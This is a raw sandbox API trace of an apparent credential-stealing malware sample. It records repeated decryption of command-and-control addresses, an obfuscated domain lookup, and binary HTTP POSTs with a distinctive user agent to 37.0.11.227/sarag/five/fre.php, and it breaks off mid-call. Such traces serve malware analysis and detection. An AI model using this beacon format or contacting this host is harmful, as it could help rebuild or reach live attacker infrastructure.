[0178.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0178.876] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0178.876] GetProcessHeap () returned 0x690000 [0178.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0178.876] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ad838*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae910*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0178.876] GetProcessHeap () returned 0x690000 [0178.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0178.877] socket (af=2, type=1, protocol=6) returned 0x2c0 [0178.877] connect (s=0x2c0, name=0x6ae910*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0178.905] FreeAddrInfoW (pAddrInfo=0x6ad838*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae910*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0178.905] GetProcessHeap () returned 0x690000 [0178.905] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0178.905] GetProcessHeap () returned 0x690000 [0178.905] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0178.905] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0178.906] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0178.906] GetProcessHeap () returned 0x690000 [0178.906] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a92a0 [0178.906] GetProcessHeap () returned 0x690000 [0178.907] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0178.907] GetProcessHeap () returned 0x690000 [0178.907] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0178.907] GetProcessHeap () returned 0x690000 [0178.907] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0178.907] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0178.908] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0178.908] GetProcessHeap () returned 0x690000 [0178.908] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0178.908] GetProcessHeap () returned 0x690000 [0178.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0178.909] send (s=0x2c0, buf=0x6abd08*, len=242, flags=0) returned 242 [0178.909] send (s=0x2c0, buf=0x6aba40*, len=159, flags=0) returned 159 [0178.909] GetProcessHeap () returned 0x690000 [0178.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6af418 [0178.909] recv (in: s=0x2c0, buf=0x6af418, len=4048, flags=0 | out: buf=0x6af418*) returned 204 [0178.988] GetProcessHeap () returned 0x690000 [0178.988] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0178.988] GetProcessHeap () returned 0x690000 [0178.988] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0178.988] GetProcessHeap () returned 0x690000 [0178.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a92a0 | out: hHeap=0x690000) returned 1 [0178.989] GetProcessHeap () returned 0x690000 [0178.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0178.989] closesocket (s=0x2c0) returned 0 [0178.991] GetProcessHeap () returned 0x690000 [0178.991] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0178.991] GetProcessHeap () returned 0x690000 [0178.992] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0178.992] GetProcessHeap () returned 0x690000 [0178.992] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0178.992] GetProcessHeap () returned 0x690000 [0178.992] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0178.993] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6af418, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd7c) returned 0x2c0 [0178.995] Sleep (dwMilliseconds=0xea60) [0178.996] GetProcessHeap () returned 0x690000 [0178.996] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0178.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0178.998] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.006] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0179.018] GetProcessHeap () returned 0x690000 [0179.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0179.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.019] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0179.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.021] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.022] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.022] GetProcessHeap () returned 0x690000 [0179.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0179.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.026] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0179.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.037] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0179.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.038] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0179.038] GetProcessHeap () returned 0x690000 [0179.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0179.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.039] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0179.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.040] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0179.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.041] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0179.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.042] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0179.042] GetProcessHeap () returned 0x690000 [0179.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0179.042] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0179.043] GetProcessHeap () returned 0x690000 [0179.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0179.043] GetProcessHeap () returned 0x690000 [0179.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0179.044] GetProcessHeap () returned 0x690000 [0179.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0179.044] GetProcessHeap () returned 0x690000 [0179.044] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0179.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.045] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.052] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0179.061] GetProcessHeap () returned 0x690000 [0179.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0179.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.062] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0179.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.063] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.064] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.064] GetProcessHeap () returned 0x690000 [0179.065] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0179.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.066] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0179.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.067] CryptDestroyKey (hKey=0x69d028) returned 1 [0179.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.068] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0179.068] GetProcessHeap () returned 0x690000 [0179.068] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0179.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.073] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0179.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.077] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0179.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.081] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0179.082] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.082] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0179.082] GetProcessHeap () returned 0x690000 [0179.082] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0179.082] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adea0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0179.082] GetProcessHeap () returned 0x690000 [0179.082] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0179.082] socket (af=2, type=1, protocol=6) returned 0x2c4 [0179.083] connect (s=0x2c4, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0179.113] FreeAddrInfoW (pAddrInfo=0x6adea0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0179.113] GetProcessHeap () returned 0x690000 [0179.113] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0179.113] GetProcessHeap () returned 0x690000 [0179.113] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0179.114] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0179.115] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0179.115] GetProcessHeap () returned 0x690000 [0179.115] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a92a0 [0179.115] GetProcessHeap () returned 0x690000 [0179.115] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0179.115] GetProcessHeap () returned 0x690000 [0179.115] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0179.115] GetProcessHeap () returned 0x690000 [0179.115] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0179.116] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0179.117] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0179.117] GetProcessHeap () returned 0x690000 [0179.117] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0179.117] GetProcessHeap () returned 0x690000 [0179.117] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0179.117] send (s=0x2c4, buf=0x6abd08*, len=242, flags=0) returned 242 [0179.118] send (s=0x2c4, buf=0x6aba40*, len=159, flags=0) returned 159 [0179.118] GetProcessHeap () returned 0x690000 [0179.118] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6af418 [0179.118] recv (in: s=0x2c4, buf=0x6af418, len=4048, flags=0 | out: buf=0x6af418*) returned 204 [0179.192] GetProcessHeap () returned 0x690000 [0179.193] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0179.193] GetProcessHeap () returned 0x690000 [0179.193] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0179.194] GetProcessHeap () returned 0x690000 [0179.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a92a0 | out: hHeap=0x690000) returned 1 [0179.194] GetProcessHeap () returned 0x690000 [0179.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0179.194] closesocket (s=0x2c4) returned 0 [0179.195] GetProcessHeap () returned 0x690000 [0179.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0179.195] GetProcessHeap () returned 0x690000 [0179.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0179.196] GetProcessHeap () returned 0x690000 [0179.196] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0179.196] GetProcessHeap () returned 0x690000 [0179.196] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0179.197] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6af418, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8fc) returned 0x2c4 [0179.198] Sleep (dwMilliseconds=0xea60) [0179.200] GetProcessHeap () returned 0x690000 [0179.200] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0179.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.202] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.208] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0179.216] GetProcessHeap () returned 0x690000 [0179.216] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0179.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.217] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0179.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.218] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.219] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.219] GetProcessHeap () returned 0x690000 [0179.220] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0179.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.222] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0179.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.223] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0179.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.224] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0179.224] GetProcessHeap () returned 0x690000 [0179.224] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0179.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.225] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0179.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.227] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0179.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.230] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0179.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.231] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0179.231] GetProcessHeap () returned 0x690000 [0179.231] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0179.231] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0179.232] GetProcessHeap () returned 0x690000 [0179.232] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0179.232] GetProcessHeap () returned 0x690000 [0179.233] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0179.233] GetProcessHeap () returned 0x690000 [0179.234] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0179.234] GetProcessHeap () returned 0x690000 [0179.234] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0179.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.237] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0179.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.257] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0179.264] GetProcessHeap () returned 0x690000 [0179.264] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0179.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.265] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0179.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.266] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0179.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.267] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0179.267] GetProcessHeap () returned 0x690000 [0179.267] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0179.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.268] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0179.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.269] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0179.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0179.270] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0179.270] GetProcessHeap () returned 0x690000 [0179.270] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0179.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.271] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0179.272] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.272] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0179.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.273] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0179.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0179.274] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0179.274] GetProcessHeap () returned 0x690000 [0179.274] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0179.274] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ad9a0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0179.274] GetProcessHeap () returned 0x690000 [0179.274] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0179.274] socket (af=2, type=1, protocol=6) returned 0x2c8 [0179.274] connect (s=0x2c8, name=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0179.303] FreeAddrInfoW (pAddrInfo=0x6ad9a0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, 